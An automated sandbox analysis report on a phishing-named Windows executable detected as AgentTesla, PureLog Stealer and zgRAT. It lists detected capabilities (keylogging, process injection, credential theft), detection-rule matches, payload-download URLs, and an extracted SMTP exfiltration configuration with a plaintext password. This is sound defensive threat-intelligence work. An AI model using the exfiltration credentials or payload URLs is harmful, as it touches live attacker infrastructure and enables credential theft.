Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ShippingOrder_ GSHS2400052.exe

Overview

General Information

Sample name:ShippingOrder_ GSHS2400052.exe
Analysis ID:1429031
MD5:5a9bf748b2b3431b39e5a8fea6feaa80
SHA1:08a558eb27295a8e3f70a7a05cf958e2907fd970
SHA256:3801a5a9dd369ed4fefc953437c2059d00da7b98fabd3ec68262ef48f9718bcf
Tags:exeShipping
Infos:

Detection

AgentTesla, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ShippingOrder_ GSHS2400052.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe" MD5: 5A9BF748B2B3431B39E5A8FEA6FEAA80)
    • MSBuild.exe (PID: 6816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • WerFault.exe (PID: 6968 cmdline: C:\Windows\system32\WerFault.exe -u -p 6424 -s 2408 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.iaa-airferight.com", "Username": "mail@iaa-airferight.com", "Password": "Asaprocky11"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ShippingOrder_ GSHS2400052.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2011142361.0000000013011000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000001.00000002.4105077153.0000000002B51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000001.00000002.4105077153.0000000002B51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 14 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                    0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        Click to see the 27 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Silenttrinity Stager Msbuild Activity
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 172.67.74.152, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6816, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6816, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.iaa-airferight.com", "Username": "mail@iaa-airferight.com", "Password": "Asaprocky11"}
                        Multi AV Scanner detection for domain / URL
                        Source: playerenterprises.orgVirustotal: Detection: 11%Perma Link
                        Source: http://playerenterprises.orgVirustotal: Detection: 11%Perma Link
                        Source: https://playerenterprises.org/BaseVirtualEnvironment/6621c520c9ebd.txt0Virustotal: Detection: 9%Perma Link
                        Source: https://playerenterprises.org/BaseVirtualEnvironment/6621c520c9ebd.txtVirustotal: Detection: 9%Perma Link
                        Source: https://playerenterprises.org/BaseVirtualEnvironment/yummy.txtVirustotal: Detection: 9%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: ShippingOrder_ GSHS2400052.exeReversingLabs: Detection: 34%
                        Source: ShippingOrder_ GSHS2400052.exeVirustotal: Detection: 42%Perma Link
                        Source: unknownHTTPS traffic detected: 193.222.96.147:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: ShippingOrder_ GSHS2400052.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\computer\Desktop\Outputs\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe
                        Source: Binary string: System.Xml.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.PDB source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: SymbolDocumentGenerator.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013011000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmp, WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.pdb0.7 source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.pdbMZ source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: .pdbm source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: \??\C:\Windows\symbols\exe\EemsbncoNl.pdbA source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdbMZ@ source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: EemsbncoNl.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: C:\Windows\EemsbncoNl.pdbpdboNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C227000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: \??\C:\Windows\EemsbncoNl.pdbpdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C227000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: symbols\exe\EemsbncoNl.pdbb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: indoC:\Windows\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Core.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: 8C:\Windows\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdbSystem.Xml.ni.dll source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: mscorlib.pdb` source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: mscorlib.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Configuration.pdbShippingOrder_ GSHS2400052.exemscorlib.dll source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: \??\C:\Users\user\Desktop\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ShippingOrder_ GSHS2400052.PDB@ source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: \??\C:\Windows\symbols\exe\EemsbncoNl.pdb` source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\computer\Desktop\Outputs\EemsbncoNl.pdb931}\ source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C1E1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\exe\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C227000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: \??\C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.PDB source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C227000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: C:\Users\user\Desktop\EemsbncoNl.pdb@ source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp

                        Networking

                        barindex
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: ShippingOrder_ GSHS2400052.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.ShippingOrder_ GSHS2400052.exe.d00000.0.unpack, type: UNPACKEDPE
                        Source: global trafficHTTP traffic detected: GET /BaseVirtualEnvironment/yummy.txt HTTP/1.1Host: playerenterprises.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /BaseVirtualEnvironment/6621c520c9ebd.txt HTTP/1.1Host: playerenterprises.org
                        Source: Joe Sandbox ViewIP Address: 46.175.148.58 46.175.148.58
                        Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                        Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                        Source: Joe Sandbox ViewASN Name: ASLAGIDKOM-NETUA ASLAGIDKOM-NETUA
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: global trafficTCP traffic: 192.168.2.4:49734 -> 46.175.148.58:25
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.53.13.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.53.13.32
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /BaseVirtualEnvironment/yummy.txt HTTP/1.1Host: playerenterprises.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /BaseVirtualEnvironment/6621c520c9ebd.txt HTTP/1.1Host: playerenterprises.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: playerenterprises.org
                        Source: MSBuild.exe, 00000001.00000002.4105077153.0000000002B7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.iaa-airferight.com
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1873279881.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://playerenterprises.org
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1873279881.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.4105077153.0000000002B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013AA1000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013382000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.4097776387.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013AA1000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013382000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.4097776387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.4105077153.0000000002B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: MSBuild.exe, 00000001.00000002.4105077153.0000000002B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                        Source: MSBuild.exe, 00000001.00000002.4105077153.0000000002B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1873279881.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://playerenterprises.org
                        Source: ShippingOrder_ GSHS2400052.exeString found in binary or memory: https://playerenterprises.org/BaseVirtualEnvironment/6621c520c9ebd.txt
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1873279881.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://playerenterprises.org/BaseVirtualEnvironment/6621c520c9ebd.txt0
                        Source: ShippingOrder_ GSHS2400052.exeString found in binary or memory: https://playerenterprises.org/BaseVirtualEnvironment/yummy.txt
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownHTTPS traffic detected: 193.222.96.147:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to log keystrokes (.Net Source)
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, abAX9N.cs.Net Code: BFeixnEv
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.raw.unpack, abAX9N.cs.Net Code: BFeixnEv
                        Installs a global keyboard hook
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Initial sample is a PE file and has a suspicious name
                        Source: initial sampleStatic PE information: Filename: ShippingOrder_ GSHS2400052.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeCode function: 0_2_00007FFD9B8A9F400_2_00007FFD9B8A9F40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01154A981_2_01154A98
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0115ADF01_2_0115ADF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01153E801_2_01153E80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_011541C81_2_011541C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0115F8A51_2_0115F8A5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_064135781_2_06413578
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_06415D301_2_06415D30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_064145A01_2_064145A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_064110301_2_06411030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0641E0B91_2_0641E0B9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0641A1401_2_0641A140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_064191E01_2_064191E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_064156501_2_06415650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0641C6181_2_0641C618
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_06413C8F1_2_06413C8F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_064103281_2_06410328
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6424 -s 2408
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs ShippingOrder_ GSHS2400052.exe
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSymbolDocumentGenerator.dll4 vs ShippingOrder_ GSHS2400052.exe
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs ShippingOrder_ GSHS2400052.exe
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSymbolDocumentGenerator.dll4 vs ShippingOrder_ GSHS2400052.exe
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSymbolDocumentGenerator.dll4 vs ShippingOrder_ GSHS2400052.exe
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1873279881.0000000007FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs ShippingOrder_ GSHS2400052.exe
                        Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpack, m0AlqHNW5c0F66NVdaA.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpack, m0AlqHNW5c0F66NVdaA.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpack, m0AlqHNW5c0F66NVdaA.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, RsYAkkzVoy.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, Kqqzixk.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, xROdzGigX.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, ywes.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, iPVW0zV.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, 1Pi9sgbHwoV.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
